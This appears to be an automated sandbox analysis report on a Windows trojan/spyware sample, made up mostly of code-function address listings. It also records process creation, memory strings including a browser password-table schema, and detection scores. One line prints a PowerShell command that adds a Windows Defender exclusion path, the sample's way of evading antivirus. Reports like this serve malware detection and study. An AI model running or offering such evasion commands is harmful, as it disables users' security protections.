Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C80591	5_2_01C80591
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC0535	5_2_01BC0535
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C6E4F6	5_2_01C6E4F6
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C72446	5_2_01C72446
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C64420	5_2_01C64420
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBC7C0	5_2_01BBC7C0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC0770	5_2_01BC0770
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE4750	5_2_01BE4750
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BDC6E0	5_2_01BDC6E0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC29A0	5_2_01BC29A0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C8A9A6	5_2_01C8A9A6
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BD6962	5_2_01BD6962
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BA68B8	5_2_01BA68B8
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEE8F0	5_2_01BEE8F0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC2840	5_2_01BC2840
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BCA840	5_2_01BCA840
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C76BD7	5_2_01C76BD7
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C7AB40	5_2_01C7AB40
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBEA80	5_2_01BBEA80
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BD8DBF	5_2_01BD8DBF
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBADE0	5_2_01BBADE0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BCAD00	5_2_01BCAD00
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C5CD1F	5_2_01C5CD1F
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB0CF2	5_2_01BB0CF2
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C60CB5	5_2_01C60CB5
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC0C00	5_2_01BC0C00
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C3EFA0	5_2_01C3EFA0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB2FC8	5_2_01BB2FC8
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C34F40	5_2_01C34F40
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE0F30	5_2_01BE0F30
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C02F28	5_2_01C02F28
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C62F30	5_2_01C62F30
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C7EEDB	5_2_01C7EEDB
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BD2E90	5_2_01BD2E90
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C7CE93	5_2_01C7CE93
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C7EE26	5_2_01C7EE26
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC0E59	5_2_01BC0E59
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BCB1B0	5_2_01BCB1B0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C8B16B	5_2_01C8B16B
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BAF172	5_2_01BAF172
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BF516C	5_2_01BF516C
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C6F0CC	5_2_01C6F0CC
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C7F0E0	5_2_01C7F0E0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C770E9	5_2_01C770E9
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC70C0	5_2_01BC70C0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C0739A	5_2_01C0739A
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C7132D	5_2_01C7132D
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BAD34C	5_2_01BAD34C
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC52A0	5_2_01BC52A0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C612ED	5_2_01C612ED
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BDD2F0	5_2_01BDD2F0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BDB2C0	5_2_01BDB2C0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C895C3	5_2_01C895C3
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C5D5B0	5_2_01C5D5B0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C77571	5_2_01C77571
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB1460	5_2_01BB1460
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C7F43F	5_2_01C7F43F
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C7F7B0	5_2_01C7F7B0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C716CC	5_2_01C716CC
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C05630	5_2_01C05630
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C55910	5_2_01C55910
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC9950	5_2_01BC9950
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BDB950	5_2_01BDB950
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC38E0	5_2_01BC38E0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C2D800	5_2_01C2D800
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C35BF0	5_2_01C35BF0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BDFB80	5_2_01BDFB80
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BFDBF9	5_2_01BFDBF9
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C7FB76	5_2_01C7FB76
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C6DAC6	5_2_01C6DAC6
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C05AA0	5_2_01C05AA0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C61AA3	5_2_01C61AA3
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C5DAAC	5_2_01C5DAAC
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C77A46	5_2_01C77A46
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C7FA49	5_2_01C7FA49
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C33A6C	5_2_01C33A6C
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BDFDC0	5_2_01BDFDC0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C71D5A	5_2_01C71D5A
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C77D73	5_2_01C77D73
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC3D40	5_2_01BC3D40
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C7FCF2	5_2_01C7FCF2
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C39C32	5_2_01C39C32
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC1F92	5_2_01BC1F92
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01B83FD2	5_2_01B83FD2
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01B83FD5	5_2_01B83FD5
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C7FFB1	5_2_01C7FFB1
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C7FF09	5_2_01C7FF09
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC9EB0	5_2_01BC9EB0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_038803E6	11_2_038803E6
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037CE3F0	11_2_037CE3F0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0387A352	11_2_0387A352
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_038402C0	11_2_038402C0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_03860274	11_2_03860274
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_038801AA	11_2_038801AA
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_038741A2	11_2_038741A2
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_038781CC	11_2_038781CC
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037B0100	11_2_037B0100
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0385A118	11_2_0385A118
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_03848158	11_2_03848158
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_03852000	11_2_03852000
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037C0770	11_2_037C0770
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037E4750	11_2_037E4750
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037BC7C0	11_2_037BC7C0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037DC6E0	11_2_037DC6E0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_03880591	11_2_03880591
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037C0535	11_2_037C0535
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0386E4F6	11_2_0386E4F6
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_03864420	11_2_03864420
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_03872446	11_2_03872446
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_03876BD7	11_2_03876BD7
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0387AB40	11_2_0387AB40
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037BEA80	11_2_037BEA80
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037D6962	11_2_037D6962
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0388A9A6	11_2_0388A9A6
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037C29A0	11_2_037C29A0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037CA840	11_2_037CA840
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037C2840	11_2_037C2840
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037EE8F0	11_2_037EE8F0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037A68B8	11_2_037A68B8
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0383EFA0	11_2_0383EFA0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037E0F30	11_2_037E0F30
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_03802F28	11_2_03802F28
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037B2FC8	11_2_037B2FC8
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_03862F30	11_2_03862F30
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_03834F40	11_2_03834F40
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0387CE93	11_2_0387CE93
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037C0E59	11_2_037C0E59
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0387EEDB	11_2_0387EEDB
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0387EE26	11_2_0387EE26
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037D2E90	11_2_037D2E90
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037CAD00	11_2_037CAD00
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0385CD1F	11_2_0385CD1F
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037BADE0	11_2_037BADE0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037D8DBF	11_2_037D8DBF
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_03860CB5	11_2_03860CB5
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037C0C00	11_2_037C0C00
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037B0CF2	11_2_037B0CF2
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0380739A	11_2_0380739A
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037AD34C	11_2_037AD34C
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0387132D	11_2_0387132D
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_038612ED	11_2_038612ED
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037DD2F0	11_2_037DD2F0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037DB2C0	11_2_037DB2C0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037C52A0	11_2_037C52A0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037AF172	11_2_037AF172
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037F516C	11_2_037F516C
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037CB1B0	11_2_037CB1B0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0388B16B	11_2_0388B16B
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0386F0CC	11_2_0386F0CC
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0387F0E0	11_2_0387F0E0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_038770E9	11_2_038770E9
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037C70C0	11_2_037C70C0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0387F7B0	11_2_0387F7B0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_038716CC	11_2_038716CC
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_03805630	11_2_03805630
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0385D5B0	11_2_0385D5B0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_038895C3	11_2_038895C3
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_03877571	11_2_03877571
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037B1460	11_2_037B1460
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0387F43F	11_2_0387F43F
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_03835BF0	11_2_03835BF0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037FDBF9	11_2_037FDBF9
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0387FB76	11_2_0387FB76
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037DFB80	11_2_037DFB80
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_03805AA0	11_2_03805AA0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_03861AA3	11_2_03861AA3
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0385DAAC	11_2_0385DAAC
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0386DAC6	11_2_0386DAC6
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_03877A46	11_2_03877A46
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0387FA49	11_2_0387FA49
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_03833A6C	11_2_03833A6C
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037C9950	11_2_037C9950
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037DB950	11_2_037DB950
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_03855910	11_2_03855910
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0382D800	11_2_0382D800
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037C38E0	11_2_037C38E0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0387FFB1	11_2_0387FFB1
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0387FF09	11_2_0387FF09
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_03783FD2	11_2_03783FD2
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_03783FD5	11_2_03783FD5
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037C1F92	11_2_037C1F92
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037C9EB0	11_2_037C9EB0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037C3D40	11_2_037C3D40
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037DFDC0	11_2_037DFDC0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_03871D5A	11_2_03871D5A
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_03877D73	11_2_03877D73
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0387FCF2	11_2_0387FCF2
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_03839C32	11_2_03839C32
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_02EB1BD0	11_2_02EB1BD0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_02EACB00	11_2_02EACB00
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_02EAADA0	11_2_02EAADA0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_02EACD20	11_2_02EACD20
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_02EB5200	11_2_02EB5200
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_02ECB7C0	11_2_02ECB7C0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_02EB3440	11_2_02EB3440
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_02EB343B	11_2_02EB343B
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0363E2E4	11_2_0363E2E4
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0363E7A8	11_2_0363E7A8
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0363E79F	11_2_0363E79F
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0363E403	11_2_0363E403
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0363CAF7	11_2_0363CAF7
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0363D868	11_2_0363D868
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0363D833	11_2_0363D833

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: String function: 01C07E54 appears 107 times
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: String function: 01BF5130 appears 58 times
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: String function: 01C2EA12 appears 86 times
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: String function: 01BAB970 appears 262 times
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: String function: 01C3F290 appears 103 times
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: String function: 037AB970 appears 262 times
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: String function: 0383F290 appears 103 times
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: String function: 03807E54 appears 107 times
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: String function: 037F5130 appears 58 times
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: String function: 0382EA12 appears 86 times

Source: A4mmSHCUi2.exe

Static PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"

Source: A4mmSHCUi2.exe, 00000000.00000002.1684208804.00000000079F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs A4mmSHCUi2.exe
Source: A4mmSHCUi2.exe, 00000000.00000000.1642340263.00000000007D2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameJFzb.exe. vs A4mmSHCUi2.exe
Source: A4mmSHCUi2.exe, 00000000.00000002.1668794168.0000000000CFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs A4mmSHCUi2.exe
Source: A4mmSHCUi2.exe, 00000005.00000002.1986394756.0000000001CAD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs A4mmSHCUi2.exe
Source: A4mmSHCUi2.exe, 00000005.00000002.1984668325.0000000001756000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenslookup.exej% vs A4mmSHCUi2.exe
Source: A4mmSHCUi2.exe, 00000005.00000002.1984668325.0000000001740000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenslookup.exej% vs A4mmSHCUi2.exe
Source: A4mmSHCUi2.exe	Binary or memory string: OriginalFilenameJFzb.exe. vs A4mmSHCUi2.exe

Source: A4mmSHCUi2.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: A4mmSHCUi2.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.A4mmSHCUi2.exe.45882f0.2.raw.unpack, U8xH9ldD4CjKQuEwfo.cs	Security API names: _0020.SetAccessControl
Source: 0.2.A4mmSHCUi2.exe.45882f0.2.raw.unpack, U8xH9ldD4CjKQuEwfo.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.A4mmSHCUi2.exe.45882f0.2.raw.unpack, U8xH9ldD4CjKQuEwfo.cs	Security API names: _0020.AddAccessRule
Source: 0.2.A4mmSHCUi2.exe.45006d0.1.raw.unpack, fI4KCYYaE0KstsmM8Z.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.A4mmSHCUi2.exe.45006d0.1.raw.unpack, U8xH9ldD4CjKQuEwfo.cs	Security API names: _0020.SetAccessControl
Source: 0.2.A4mmSHCUi2.exe.45006d0.1.raw.unpack, U8xH9ldD4CjKQuEwfo.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.A4mmSHCUi2.exe.45006d0.1.raw.unpack, U8xH9ldD4CjKQuEwfo.cs	Security API names: _0020.AddAccessRule
Source: 0.2.A4mmSHCUi2.exe.45882f0.2.raw.unpack, fI4KCYYaE0KstsmM8Z.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.A4mmSHCUi2.exe.79f0000.3.raw.unpack, fI4KCYYaE0KstsmM8Z.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.A4mmSHCUi2.exe.79f0000.3.raw.unpack, U8xH9ldD4CjKQuEwfo.cs	Security API names: _0020.SetAccessControl
Source: 0.2.A4mmSHCUi2.exe.79f0000.3.raw.unpack, U8xH9ldD4CjKQuEwfo.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.A4mmSHCUi2.exe.79f0000.3.raw.unpack, U8xH9ldD4CjKQuEwfo.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@13/7@15/13

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\A4mmSHCUi2.exe.log

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r3ik5t5z.gk5.ps1

Jump to behavior

Source: A4mmSHCUi2.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: A4mmSHCUi2.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: nslookup.exe, 0000000B.00000003.2167324670.0000000002F85000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 0000000B.00000003.2167423993.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4107199032.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: A4mmSHCUi2.exe	ReversingLabs: Detection: 60%
Source: A4mmSHCUi2.exe	Virustotal: Detection: 37%

Source: unknown	Process created: C:\Users\user\Desktop\A4mmSHCUi2.exe "C:\Users\user\Desktop\A4mmSHCUi2.exe"
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\A4mmSHCUi2.exe"
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process created: C:\Users\user\Desktop\A4mmSHCUi2.exe "C:\Users\user\Desktop\A4mmSHCUi2.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process created: C:\Users\user\Desktop\A4mmSHCUi2.exe "C:\Users\user\Desktop\A4mmSHCUi2.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	Process created: C:\Windows\SysWOW64\nslookup.exe "C:\Windows\SysWOW64\nslookup.exe"
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
